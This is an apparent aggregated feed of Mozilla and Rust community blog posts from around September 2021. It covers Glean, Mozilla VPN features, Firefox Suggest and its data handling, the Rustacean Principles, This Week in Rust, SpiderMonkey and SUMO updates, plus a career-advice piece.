It took us several more weeks to put everything into place, but we're finally shipping the Rust parts of the Glean Android SDK with GeckoView and consume that in Android Components and Fenix. And it still all works, collects data and is sending pings! Additionally this results in a slightly smaller APK as well.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

The Mozilla BlogThe Great Resignation: New gig? Here are 7 tips to ensure success

If recent surveys and polls ring true, over 46% of the global workforce is considering leaving their employer this year. Despite COVID-19 causing initial turnover due to the related economic downturn, the current phenomenon coined “The Great Resignation” is attributed to the many job seekers choosing to leave their current employment voluntarily. Mass vaccinations and mask mandates have allowed offices to re-open just as job seekers are reassessing work-life balance, making bold moves to take control of where they choose to live and work. 

The “New Normal”

Millions of workers have adjusted to remote-flexible work arrangements, finding success and a greater sense of work-life balance. The question is whether or not employers will permanently allow this benefit post-pandemic.

Jerry Lee, COO/Founder of the career development consultancy, Wonsulting, sees changes coming to the workplace power dynamic.

“In the future of work, employers will have to be much more employee-first beyond monetary compensation,” he said. “There is a shift of negotiating power moving from the employers to the employees, which calls for company benefits and work-life balance to improve.” 

Abbie Duckham, Talent Operations Program Manager at Mozilla, believes the days of companies choosing people are long over. 

“From a hiring lens, it’s no longer about companies choosing people, it’s about people choosing companies,” Duckham said. “People are choosing to work at companies that, yes, value productivity and revenue – but more-so companies that value mental health and understand that every single person on their staff has a different home life or work-life balance.”

Drop the mic and cue the job switch

So, how can recent job switchers or job seekers better prepare for their next big move? The following tips and advice from career and talent sourcing experts can help anyone perform their best while adapting to our current pandemic reality.

Take a vacation *seriously*

When starting a new role many are keen to jump into work right away; however, it’s always important to take a mental break between your different roles before you start another onboarding process,” advises Jonathan Javier, CEO/Founder at Wonsulting. “One way to do this is to plan your vacations ahead of your switch: that trip to Hawaii you always wanted? Plan it right after you end your job. That time you wanted to spend with your significant other? Enjoy that time off.” 

It also never hurts to negotiate a start date that prioritizes your mental preparedness and well-being.

Out with the old and in with that new-new

When Duckham started at Mozilla, she made it her mission to absorb every bit of the manifesto to better understand Mozilla’s culture. “From there I looked into what we actually do as a company. Setting up a Firefox account was pretty crucial since we are all about dog-fooding here (or as we call it, foxfooding), and then downloading Firefox Nightly, the latest beta-snapshot of the browser as our developers are actively working on it.”

Duckham also implores job-switchers to rebrand themselves. 

“You have a chance to take everything you wanted your last company to know about you and restart,” she said. “Take everything you had imposter syndrome about and flip the switch.”

Network early

“When you join a new company, it’s important to identify the subject matter experts for different functions of your company so you know who you can reach out to if you have any questions or need insights,” Javier said.

Javier also recommends networking with people who have also switched jobs. 

“You can search for and find people who switched from non-tech roles to an in-tech role by simply searching for ‘Past Company’ at a non-tech company and then putting ‘Current Company’ at a tech company on LinkedIn,” he said.

Brain-breaks 

Duckham went as far as giving her digital workspace a refreshing overhaul when she started at Mozilla. 

“I cleaned off my desktop, made folders for storing files, and essentially crafted a blank working space to start fresh from my previous company – effectively tabula rasa-ing my digital workspace did the same for my mental state as I prepared to absorb tons of new processes and practices.”

In that same vein, when you need a bit of a brain-break throughout the work day and that break leads you to social media, Duckham advises downloading Facebook Container, a browser extension that makes it harder for Facebook to track you on the web outside of Facebook.

“Speaking of brain-breaks, if socials aren’t your thing and you’d rather catch up on written curated content from around the web, Pocket is an excellent way to let your mind wander and breathe during the work day so you’re able return to work a little more refreshed,” Duckham added.

Making remote friends and drawing boundary lines

56% of Mozilla employees signed in to work from remote locations all over the world, even before the pandemic. Working asynchronously across so many time zones can be unusual for new teammates. Duckham’s biggest tip for new Mozillians? 

“Be open and a little vulnerable. Do you need to take your kid to school every day, does your dog require a mid-day walk? Chances are your schedule is just as unique as the person in the Zoom window next to you. Be open about the personal time you need to take throughout the day and then build your work schedule around it.” 

But what about building comradery and remote-friendships

“In a traditional work environment, you might run into your colleagues in the break room and have a quick chat. As roles continue to become more remote or hybrid-first, it is important to create opportunities for you to mingle with your colleagues,” Jerry Lee of Wonsulting said. “These small interactions are what builds long-lasting friendships, which in turn allows you to feel more comfortable and productive at work.”

How to leverage pay, flexibility and other benefits even if you aren’t job searching

“The best leverage you can find in this job market – is clearly defining what is important for you and making sure you have that option in your role,” Lee said. 

He’s not wrong. Make sure to consider your current growth opportunities, autonomy, location, work-life flexibility and compensation, of course. For example, if you are looking for a flexible-remote arrangement, Lee suggests clearly articulating what it is you want to your manager using the following talk-track as a guide:

Hey Manager!

I’m looking for ways to better incorporate my work into my personal life, and I’ve realized one important factor for me is location flexibility. I’m looking to move around a bit in the next few years but would love to continue the work I have here.

What can we do to make this happen?

Once you make your request, you’ll need to work with your manager to ensure your productivity and impact improves or at least remains the same.

Finally, it’s always helpful to remind yourself that every ‘big’ career move is the result of several smaller moves. If you’re looking to make a switch or simply reassessing your current work-life balance, Javier recommends practicing vision boarding. “I do this by drawing my current state and what I want my future state to look like,” said Javier. “Even if your drawings are subpar, you’ll be able to visualize what you want to accomplish in the future and make it into reality.”

As the Great Resignation continues, it is important to keep in mind that getting a new job is just the start of the journey. There are important steps that you can do, and Firefox and Pocket can help, to make sure that you feel ready for your next career adventure.

Firefox browser logo

Get Firefox

Get the browser that protects what’s important

About our experts

Jonathan Javier is the CEO/Founder of Wonsulting, whose mission is to “turn underdogs into winners”. He’s also worked in Operations at Snap, Google, and Cisco coming from a non-target school/non-traditional background. He works on many initiatives, providing advice and words of wisdom on LinkedIn and through speaking engagements. In total, he has led 210+ workshops in 9 different countries including the Mena ICT Forum in Jordan, Resume/Personal Branding at Cisco, LinkedIn Strategy & Operations Offsite, Great Place To Work, Talks at Google, TEDx, and more. He’s been featured on Forbes, Fox News, Business Insider, The Times, LinkedIn News, Yahoo! News, Jobscan, and Brainz Magazine as a top job search expert and amassed 1M+ followers on LinkedIn, Instagram, TikTok as well as 30+ million impressions monthly on his content.

Jerry Lee is the COO/Founder of Wonsulting and an ex-Senior Strategy & Operations Manager at Google & used to lead Product Strategy at Lucid. He is from Torrance, California and graduated summa cum laude from Babson College. After graduating, Jerry was hired as the youngest analyst in his organization by being promoted multiple times in 2 years to his current position. After he left Google, he was the youngest person to lead a strategy team at Lucid. Jerry partners with universities & organizations (220+ to date) to help others land into their dream careers. He has 250K+ followers across LinkedIn, TikTok & Instagram and has reached 40M+ professionals. In addition, his work is featured on Forbes, Newsweek, Business Insider, Yahoo! News, LinkedIn & elected as the 2020 LinkedIn Top Voice for Tech. 

Abbie Duckham is the current Talent Operations Program Manager at Mozilla. She has been with the company since 2016, working out of the San Francisco Office, and now her home office in Oakland.

The post The Great Resignation: New gig? Here are 7 tips to ensure success appeared first on The Mozilla Blog.

Niko MatsakisRustacean Principles, continued

RustConf is always a good time for reflecting on the project. For me, the last week has been particularly “reflective”. Since announcing the Rustacean Principles, I’ve been having a number of conversations with members of the community about how they can be improved. I wanted to write a post summarizing some of the feedback I’ve gotten.

The principles are a work-in-progress

Sparking conversation about the principles was exactly what I was hoping for when I posted the previous blog post. The principles have mostly been the product of Josh and I iterating, and hence reflect our experiences. While the two of us have been involved in quite a few parts of the project, for the document to truly serve its purpose, it needs input from the community as a whole.

Unfortunately, for many people, the way I presented the principles made it seem like I was trying to unveil a fait accompli, rather than seeking input on a work-in-progress. I hope this post makes the intention more clear!

The principles as a continuation of Rust’s traditions

Rust has a long tradition of articulating its values. This is why we have a Code of Conduct. This is why we wrote blog posts like Fearless Concurrency, Stability as a Deliverable and Rust Once, Run Anywhere. Looking past the “engineering side” of Rust, aturon’s classic blog posts on listening and trust (part 1, part 2, part 3) did a great job of talking about what it is like to be on a Rust team. And who could forget the whole “fireflowers” debate?1

My goal with the Rustacean Principles is to help coalesce the existing wisdom found in those classic Rust blog posts into a more concise form. To that end, I took initial inspiration from how AWS uses tenets, although by this point the principles have evolved into a somewhat different form. I like the way tenets use short, crisp statements that identify important concepts, and I like the way assigning a priority ordering helps establish which should have priority. (That said, one of Rust’s oldest values is synthesis: we try to find ways to resolve constraints that are in tension by having our cake and eating it too.)

Given all of this backdrop, I was pretty enthused by a suggestion that I heard from Jacob Finkelman. He suggested adapting the principles to incorporate more of the “classic Rust catchphrases”, such as the “no new rationale” rule described in the first blog post from aturon’s series. A similar idea is to incorporate the lessons from RFCs, both successful and unsuccessful (this is what I was going for in the case studies section, but that clearly needs to be expanded).

The overall goal: Empowerment

My original intention was to structure the principles as a cascading series of ideas:

  • Rust’s top-level goal: Empowerment
    • Principles: Dissecting empowerment into its constituent pieces – reliable, performant, etc – and analyzing the importance of those pieces relative to one another.
      • Mechanisms: Specific rules that we use, like type safety, that engender the principles (reliability, performance, etc.). These mechanisms often work in favor of one principle, but can work against others.

wycats suggested that the site could do a better job of clarifying that empowerment is the top-level, overriding goal, and I agree. I’m going to try and tweak the site to make it clearer.

A goal, not a minimum bar

The principles in “How to Rustacean” were meant to be aspirational: a target to be reaching for. We’re all human: nobody does everything right all the time. But, as Matklad describes, the principles could be understood as setting up a kind of minimum bar – to be a team member, one has to show up, follow through, trust and delegate, all while bringing joy? This could be really stressful for people.

The goal for the “How to Rustacean” section is to be a way to lift people up by giving them clear guidance for how to succeed; it helps us to answer people when they ask “what should I do to get onto the lang/compiler/whatever team”. The internals thread had a number of good ideas for how to help it serve this intended purpose without stressing people out, such as cuviper’s suggestion to use fictional characters like Ferris in examples, passcod’s suggestion of discussing inclusion, or Matklad’s proposal to add something to the effect of “You don’t have to be perfect” to the list. Iteration needed!

Scope of the principles

Some people have wondered why the principles are framed in a rather general way, one that applies to all of Rust, instead of being specific to the lang team. It’s a fair question! In fact, they didn’t start this way. They started their life as a rather narrow set of “design tenets for async” that appeared in the async vision doc. But as those evolved, I found that they were starting to sound like design goals for Rust as a whole, not specifically for async.

Trying to describe Rust as a “coherent whole” makes a lot of sense to me. After all, the experience of using Rust is shaped by all of its facets: the language, the libraries, the tooling, the community, even its internal infrastructure (which contributes to that feeling of reliability by ensuring that the releases are available and high quality). Every part has its own role to play, but they are all working towards the same goal of empowering Rust’s users.2

There is an interesting question about the long-term trajectory for this work. In my mind, the principles remain something of an experiment. Presuming that they prove to be useful, I think that they would make a nice RFC.

What about “easy”?

One final bit of feedback I heard from Carl Lerche is surprise that the principles don’t include the word “easy”. This not an accident. I felt that “easy to use” was too subjective to be actionable, and that the goals of productive and supportive were more precise. However, I do think that for people to feel empowered, it’s important for them not feel mentally overloaded, and Rust can definitely have the problem of carrying a high mental load sometimes.

I’m not sure the best way to tweak the “Rust empowers by being…” section to reflect this, but the answer may lie with the Cognitive Dimensions of Notation. I was introduced to these from Felienne Herman’s excellent book The Programmer’s Brain; I quite enjoyed this journal article as well.

The idea of the CDN is to try and elaborate on the ways that tools can be easier or harder to use for a particular task. For example, Rust would likely do well on the “error prone” dimension, in that when you make changes, the compiler generally helps ensure they are correct. But Rust does tend to have a high “viscosity”, because making local changes tends to be difficult: adding a lifetime, for example, can require updating data structures all over the code in an annoying cascade.

It’s important though to keep in mind that the CDN will vary from task to task. There are many kinds of changes one can make in Rust with very low viscosity, such as adding a new dependency. On the other hand, there are also cases where Rust can be error prone, such as mixing async runtimes.

Conclusion

In retrospect, I wish I had introduced the concept of the Rustacean Principles in a different way. But the subsequent conversations have been really great, and I’m pretty excited by all the ideas on how to improve them. I want to encourage folks again to come over to the internals thread with their thoughts and suggestions.

  1. Love that web page, brson

  2. One interesting question: I do think that some tools may vary the prioritization of different aspects of Rust. For example, a tool for formal verification is obviously aimed at users that particularly value reliability, but other tools may have different audiences. I’m not sure yet the best way to capture that, it may well be that each tool can have its own take on the way that it particularly empowers. 

The Mozilla BlogMozilla VPN adds advanced privacy features: Custom DNS servers and Multi-hop

Your online privacy remains our top priority, and we know that one of the first things to secure your privacy when you go online is to get on a Virtual Private Network (VPN), an encrypted connection that serves as a tunnel between your computer and VPN server. Today, we’re launching the latest release of our Mozilla VPN, our fast and easy-to-use VPN service, with two new advanced privacy features that offer additional layers of privacy. This includes your choice of Domain Name System (DNS) servers whether it’s the default we’ve provided, our suggested ad blocking, tracker blocking or ad plus tracker blocking DNS server, or an alternative one, plus the multi-hop feature which allows you to add two different servers to give you twice the amount of encryption. Today’s Mozilla VPN release is available on Windows, Mac, Linux and Android platforms (it will soon be available on iOS later this week).

Here are today’s Mozilla VPN Features:

Uplevel your privacy with Mozilla VPN’s Custom DNS server feature

Traditionally when you go online your traffic is routed through your Internet Service Provider’s (ISP) DNS servers who may be keeping records of your online activities. DNS, which stands for Domain Name System, is like a phone book for domains, which are the websites that you visit. One of the advantages to using a VPN is shielding your online activity from your ISP by using your trusted VPN service provider’s DNS servers. There are a variety of DNS servers, from ones that offer additional features like tracker blocking, ad blocking or a combination of both tracker and ad blocking, or local DNS servers that have those benefits along with speed. 

Now, with today’s Custom DNS server, we put you in control of choosing your DNS server that fits your needs. You can find this feature in your Network Settings under Advanced DNS Settings. From there, you can choose from the default DNS server, enter your local DNS server, or choose from the recommended list of DNS servers available to you. 

<figcaption>Choose from the recommended list of DNS servers available to you</figcaption>

Double up your VPN service with Mozilla’s VPN Multi-hop feature

We’re introducing our Multi-hop feature which is also known as doubling up your VPN because instead of using one VPN server you can use two VPN servers. Here’s how it works, first your online activity is routed through one VPN server. Then, by selecting the Multi-Hop feature, your online activity will get routed a second time through an extra VPN server which is known as your exit server. Essentially, you will have two VPN servers which are known as the entry VPN server and exit VPN server. This new powerful privacy feature appeals to those who think twice about their privacy, like political activists, journalists writing sensitive topics, or anyone who’s using a public wi-fi and wants that added peace of mind by doubling-up their VPN servers.

To turn on this new feature, go to your Location, then choose Multi-hop. From there, you can choose your entry server location and your exit server location. The exit server location will be your main VPN server. We will also list your two recent Multi-hop connections so you can reuse them in the future. 

<figcaption>Choose your entry server location and your exit server location</figcaption>
<figcaption>Your two recent Multi-hop connections will also be listed and available to reuse in the future</figcaption>

How we innovate and build features for you with Mozilla VPN

Developed by Mozilla, a mission-driven company with a 20-year track record of fighting for online privacy and a healthier internet, we are committed to innovate and bring new features to the Mozilla VPN. Mozilla periodically works with third-party organizations to complement our internal security programs and help improve the overall security of our products. Mozilla recently published an independent security audit of its Mozilla VPN from Cure53, an unbiased cybersecurity firm based in Berlin with more than 15 years of running software testing and code auditing. Here is a link to the blog post and the security audit for more details. 

We know that it’s more important than ever for you to be safe, and for you to know that what you do online is your own business. By subscribing to Mozilla VPN, users support both Mozilla’s product development and our mission to build a better web for all. Check out the Mozilla VPN and subscribe today from our website.

For more on Mozilla VPN:

Mozilla VPN Completes Independent Security Audit by Cure53

Celebrating Mozilla VPN: How we’re keeping your data safe for you

Latest Mozilla VPN features keep your data safe

Mozilla Puts Its Trusted Stamp on VPN

The post Mozilla VPN adds advanced privacy features: Custom DNS servers and Multi-hop appeared first on The Mozilla Blog.

The Mozilla BlogGet where you’re going faster, with Firefox Suggest

Today, people have to work too hard to find what they want online, sifting through and steering clear of content, clutter and click-bait not worthy of their time. Over time, navigation on the internet has become increasingly centralized and optimized for clicks and scrolling, not for getting people to where they want to go or what they are looking for quickly. 

We’d like to help change this, and we think Firefox is a good place to start.

Today we’re announcing our first step towards doing that with a new feature called Firefox Suggest.

Firefox Suggest is a new discovery feature that is built directly into the browser. Firefox Suggest acts as a trustworthy guide to the better web, surfacing relevant information and sites to help people accomplish their goals. Check it out here:

Relevant, reliable answers: 

Firefox already helps people search their browsing history and tabs and use their preferred search engine directly from Firefox’s Awesome Bar. 

Firefox Suggest will enhance this by including other sources of information such as Wikipedia, Pocket articles, reviews and credible content from sponsored, vetted partners and trusted organizations. 

For instance, suppose someone types “Costa Rica” into the Awesome Bar, they might see a result from Wikipedia:

<figcaption>Firefox users can find suggestions from Wikipedia</figcaption>

Firefox Suggest also contains sponsored suggestions from vetted partners. For instance, if someone types in “vans”, we might show a sponsored result for Vans shoes on eBay:

<figcaption>Firefox users can find sponsored suggestions from vetted partners</figcaption>

We are also developing contextual suggestions. These aim to enhance and speed up your searching experience. To deliver contextual suggestions, Firefox will need to send Mozilla new data, specifically, what you type into the search bar, city-level location data to know what’s nearby and relevant, as well as whether you click on a suggestion and which suggestion you click on.

In your control:

As always, we believe people should be in control of their web experience, so Firefox Suggest will be a customizable feature. 

We’ll begin offering contextual suggestions to a percentage of people in the U.S. as an opt-in experience. 

<figcaption>Opt-in prompt for smarter, contextual suggestions</figcaption>

Find out more about the ways you can customize this experience here.

Unmatched privacy: 

We believe online ads can work without advertisers needing to know everything about you. So when people choose to enable smarter suggestions, we will collect only the data that we need to operate, update and improve the functionality of Firefox Suggest and the overall user experience based on our Lean Data and Data Privacy Principles. We will also continue to be transparent about our data and data collection practices as we develop this new feature.

A better web. 

The internet has so much to offer, and we want to help people get the best out of it faster and easier than ever before.

Firefox is the choice for people who want to experience the web as a purpose driven and independent company envisions it. We create software for people that provides real privacy, transparency and valuable help with navigating today’s internet. This is another step in our journey to build a better internet.

The post Get where you’re going faster, with Firefox Suggest appeared first on The Mozilla Blog.

Support.Mozilla.OrgWhat’s up with SUMO – September 2021

Hey SUMO folks,

September is going to be the last month for Q3, so let’s see what we’ve been up to for the past quarter.

Welcome on board!

  1. Welcome to SUMO family for Bithiah, mokich1one, handisutrian, and Pomarańczarz. Bithiah has been pretty active on contributing to the support forum for a while now, while Mokich1one, Handi, and Pomarańczarz are emerging localization contributors respectively for Japanese, Bahasa Indonesia, and Polish.

Community news

  • Read our post about the advanced customization in the forum and KB here and let us know if you still have any questions!
  • Please join me to welcome Abby into the Customer Experience Team. Abby is our new Content Manager who will be in charge of our Knowledge Base as well as Localization effort. You can learn more about Abby soon.
  • Learn more about Firefox 92 here.
  • Can you imagine what’s gonna happen when we reach version 100? Learn more about the experiment we’re running in Firefox Nightly here and see how you can help!
  • Are you a fan of Firefox Focus? Join our foxfooding campaign for focus that is coming. You can learn more about the campaign here.
  • No Kitsune update for this month. Check out SUMO Engineering Board instead to see what the team is currently doing.

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in August!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

* KB pageviews number is a total of KB pageviews for /en-US/ only
Month Page views Vs previous month
Aug 2021 8,462,165 +2.47%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Thomas8
  3. Michele Rodaro
  4. K_alex
  5. Pierre Mozinet

KB Localization

Top 10 locale based on total page views

Locale Aug 2021 pageviews (*) Localization progress (per Sep, 7)(**)
de 8.57% 99%
zh-CN 6.69% 100%
pt-BR 6.62% 63%
es 5.95% 44%
fr 5.43% 91%
ja 3.93% 57%
ru 3.70% 100%
pl 1.98% 100%
it 1.81% 86%
zh-TW 1.45% 6%
* Locale pageviews is an overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized article from all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Michele Rodaro
  3. Jim Spentzos
  4. Soucet
  5. Artist

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Aug 2021 3523 75.59% 17.40% 66.67%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Jscher2000
  4. Seburo
  5. Sfhowes

Social Support

Channel Aug 2021
Total conv Conv interacted
@firefox 2967 341
@FirefoxSupport 386 270

Top contributors in Aug 2021

  1. Christophe Villeneuve
  2. Andrew Truong
  3. Pravin

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

Other products / Experiments

  • Mozilla VPN V2.5 Expected to release 09/15
  • Fx Search experiment:
    • From Sept 6, 2021 1% of the Desktop user base will be experimenting with Bing as the default search engine. The study will last into early 2022, likely wrapping up by the end of January.
    • Common response:
      • Forum: Search study – September 2021
      • Conversocial clipboard: “Mozilla – Search study sept 2021”
      • Twitter: Hi, we are currently running a study that may cause some users to notice that their default search engine has changed. To revert back to your search engine of choice, please follow the steps in the following article → https://mzl.la/3l5UCLr
  • Firefox Suggest + Data policy update (Sept 16 + Oct 5)
    • September 16th, the Mozilla Privacy Policy will be updated to supplement the roll out of FX Suggest online mode. Currently, FX Suggest is utilizing offline mode which limits the data collected. Online mode will collect additional anonymized information after users opt-in to this feature. Users can opt-out of this experience by following the instructions here.

Shout-outs!

  • Kudos for Julie for her work in the Knowledge Base lately. She’s definitely adding a new color in our KB world with her video and article improvement.
  • Thanks to those who contributed to the FX Desktop Topics Discussion
    • If you have input or questions please post them to the thread above

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to   add them in our next edition.

Useful links:

Niko MatsakisCTCFT 2021-09-20 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place next Monday, on 2021-09-20 (in your time zone)! This post covers the agenda. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Agenda

  • Announcements
  • Interest group panel discussion

We’re going to try something a bit different this time! The agenda is going to focus on Rust interest groups and domain working groups, those brave explorers who are trying to put Rust to use on all kinds of interesting domains. Rather than having fixed presentations, we’re going to have a panel discussion with representatives from a number of Rust interest groups and domain groups, led by AngelOnFira. The idea is to open a channel for communication about how to have more active communication and feedback between interest groups and the Rust teams (in both directions).

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

Data@MozillaData and Firefox Suggest

Introduction

Firefox Suggest is a new feature that displays direct links to content on the web based on what users type into the Firefox address bar. Some of the content that appears in these suggestions is provided by partners, and some of the content is sponsored.

In building Firefox Suggest, we have followed our long-standing Lean Data Practices and Data Privacy Principles. Practically, this means that we take care to limit what we collect, and to limit what we pass on to our partners. The behavior of the feature is straightforward–suggestions are shown as you type, and are directly relevant to what you type.

We take the security of the datasets needed to provide this feature very seriously. We pursue multi-layered security controls and practices, and strive to make as much of our work as possible publicly verifiable.

In this post, we wanted to give more detail about what data is needed to provide this feature, and about how we handle it.

Changes with Firefox Suggest

The address bar experience in Firefox has long been a blend of results provided by partners (such as the user’s default search provider) and information local to the client (such as recently visited pages). For the first time, Firefox Suggest augments these data sources with search completions from Mozilla.

Firefox Suggest data flow diagram

In its current form, Firefox Suggest compares searches against a list of allowed terms that is local to the client. When the search text matches a term on the allowed list, a completion suggestion may be shown alongside the local and default search engine suggestions.

Data Collected by Mozilla

Mozilla collects the following information to power Firefox Suggest when users have opted in to contextual suggestions.

  • Search queries and suggest impressions: Firefox Suggest sends Mozilla search terms and information about engagement with Firefox Suggest, some of which may be shared with partners to provide and improve the suggested content.
  • Clicks on suggestions: When a user clicks on a suggestion, Mozilla receives notice that suggested links were clicked.
  • Location: Mozilla collects city-level location data along with searches, in order to properly serve location-sensitive queries.

How Data is Handled and Shared

Mozilla approaches handling this data conservatively. We take care to remove data from our systems as soon as it’s no longer needed. When passing data on to our partners, we are careful to only provide the partner with the minimum information required to serve the feature.

A specific example of this principle in action is the search’s location. The location of a search is derived from the Firefox client’s IP address. However, the IP address can identify a person far more precisely than is necessary for our purposes. We therefore convert the IP address to a more general location immediately after we receive it, and we remove the IP address from all datasets and reports downstream. Access to machines and (temporary, short-lived) datasets that might include the IP address is highly restricted, and limited only to a small number of administrators. We don’t enable or allow analysis on data that includes IP addresses.

We’re excited to be bringing Firefox Suggest to you. See the product announcement to learn more!

This Week In RustThis Week in Rust 408

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is qcell, with a type that works like a compile-time RefCell.

Thanks to Soni L. for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

278 pull requests were merged in the last week

Rust Compiler Performance Triage

Fairly busy week, with some large improvements on several benchmarks. Several larger rollups landed, in part due to recovery from a temporary CI outage, and continued CI trouble since then. This is likely the cause for the somewhat unusual presence of rollups in our results.

Triage done by @simulacrum. Revision range: 69c4aa290..9f85cd6

2 Regressions, 2 Improvements, 4 Mixed; 2 of them in rollups

31 comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Gouach

Indeed

Enso

SmartThings

DEMV Systems

Kollider

Polar Sync

SecureDNA

Kraken

Parity Technologies

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Edition!

Niko and Daphne Matsakis on YouTube

Thanks to mark-i-m for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Talospace ProjectFirefox 92 on POWER

Firefox 92 is out. Alongside some solid DOM and CSS improvements, the most interesting bug fix I noticed was a patch for open alerts slowing down other tabs in the same process. In the absence of a JIT we rely heavily on Firefox's multiprocessor capabilities to make the most of our multicore beasts, and this apparently benefits (among others, but in particular) the Google sites we unfortunately have to use in these less-free times. I should note for the record that on this dual-8 Talos II (64 hardware threads) I have dom.ipc.processCount modestly increased to 12 from the default of 8 to take a little more advantage of the system when idle, which also takes down fewer tabs in the rare cases when a content process bombs out. The delay in posting this was waiting for the firefox-appmenu patches, but I decided to just build it now and add those in later. The .mozconfigs and LTO-PGO patches are unchanged from Firefox 90/91.

Meanwhile, in OpenPOWER JIT progress, I'm about halfway through getting the Wasm tests to pass, though I'm currently hung up on a memory corruption bug while testing Wasm garbage collection. It's our bug; it doesn't happen with the C++ interpreter, but unfortunately like most GC bugs it requires hitting it "just right" to find the faulty code. When it all passes, we'll pull everything up to 91ESR for the MVP, and you can try building it. If you want this to happen faster, please pitch in and help.

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 92-93)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 92 and 93 Nightly release cycles.

👷🏽‍♀️ JS features

⚡ WebAssembly

  • We’ve done some work towards Memory64 support.
  • The final JS API for Wasm exceptions has been implemented.
  • We added support for WebAssembly.Function from the js-types proposal.
  • We changed unaligned floating point accesses on 32-bit ARM to not use signal handlers.
  • Wasm code is now much faster and uses less memory when the debugger is used.
  • memory.fill and memory.copy are now optimized with SIMD instructions.
  • We now print better error messages to the console for asm.js

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • We’ve rewritten our implementation of self-hosted code (builtins implemented in JS) to be based on the stencil format instead of cloning from a special zone. This has resulted in significant memory and performance improvements.
  • We’re making changes to function delazification to later allow doing this off-thread.
  • We hardened XDR decoding more against memory/disk corruption.

🌍 Unified Intl implementation

Work is underway to unify the Intl (Internalization) code in SpiderMonkey and the rest of Gecko as a shared mozilla::intl component. This results in less code duplication and will make it easier to migrate from the ICU library to ICU4X in the future.

The past weeks Intl.Collator and Intl.RelativeTimeFormat have been ported to the new mozilla::intl code.

🗂 ReShape

ReShape is a project to optimize and simplify our object layout and property representation after removing TI. This will help us fix some long-standing issues related to performance, memory usage and code complexity.

  • We converted uses of object private slots to reserved slots and then removed private slots completely. This allowed us to optimize reserved slots.
  • We changed function objects to use reserved slots instead of a custom C++ layout.
  • We saved some memory by storing only the shape instead of an object for object literals.
  • We changed the shape teleporting optimization to avoid a performance cliff and to be simpler.
  • We changed global objects to use a C++ class instead of hundreds of reserved slots.
  • We optimized object allocation, especially for plain objects, array objects and functions because these are so common.

🧹 Garbage Collection

  • We now avoid marking and sweeping arenas for permanent atoms.
  • We simplified the GC threshold code. This resulted in a number of performance improvement alerts.
  • We simplified the GC allocation code for strings.
  • We made some changes to the way slice budgets are calculated to reduce jank caused by long GC pauses.
  • We fixed an issue with JIT code discarding heuristics that caused frequent OOMs in automation on 32-bit platforms.

📚 Miscellaneous

  • We tidied up our meta bugs in Bugzilla. We now have a tree of meta bugs.
  • We optimized Map and Set operations in the JITs.
  • We fixed a number of correctness issues with super, class return values, private methods and date parsing.
  • We now auto-generate more LIR boilerplate code.
  • A new contributor, sanketh, added an option to use fdlibm for more Math functions to get consistent results across platforms and to avoid fingerprinting.
  • We removed a lot of unnecessary includes.

Firefox NightlyThese Weeks in Firefox: Issue 99

Highlights

Friends of the Firefox team

Introductions/Shout-Outs

  • Huge welcome to new hiresKatherine Patenio and Niklas Baumgardner
    • Katherine previously worked on Review Board through a student project
    • Niklas previously worked on Firefox’s Picture-in-Picture feature through a student project
    • Both will be working on driving the DTD -> Fluent migration to completion as their first project

Resolved bugs (excluding employees)

Fixed more than one bug

  • Antonin LOUBIERE
  • Ava Katushka
  • Kajal Sah

New contributors (🌟 = first patch)

Project Updates

